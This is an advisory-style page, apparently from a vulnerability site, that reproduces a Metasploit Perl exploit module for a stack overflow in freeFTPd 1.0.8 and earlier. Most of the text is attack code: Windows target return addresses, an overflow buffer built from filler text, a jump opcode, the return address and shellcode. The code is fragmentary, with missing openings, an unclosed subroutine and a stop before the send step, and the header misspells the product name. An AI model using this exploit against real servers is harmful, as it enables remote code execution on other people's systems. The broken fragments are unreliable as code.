Vulnerable Systems:
* FrreFTPd version 1.0.8 and prior
Exploit:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::freeftpd_user;
use base "Msf::Exploit";
use strict;
use Pex::Text;
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the freeFTPd
multi-protocol file transfer service. This flaw can only
be exploited when logging has been enabled (non-default).
}),
'Refs' => [
['URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],
],
'Targets' => [
['Windows 2000 English ALL', 0x75022ac4],
['Windows XP Pro SP0/SP1 English', 0x71aa32ad],
['Windows NT SP5/SP6a English', 0x776a1799],
['Windows 2003 Server English', 0x7ffc0638],
],
'Keys' => ['ftp'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}
my $splat = Pex::Text::EnglishText(1008);
my $sploit =
$splat. "\xeb\x06". pack('V', $target->[1]).
$shellcode. "\r\n";
$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
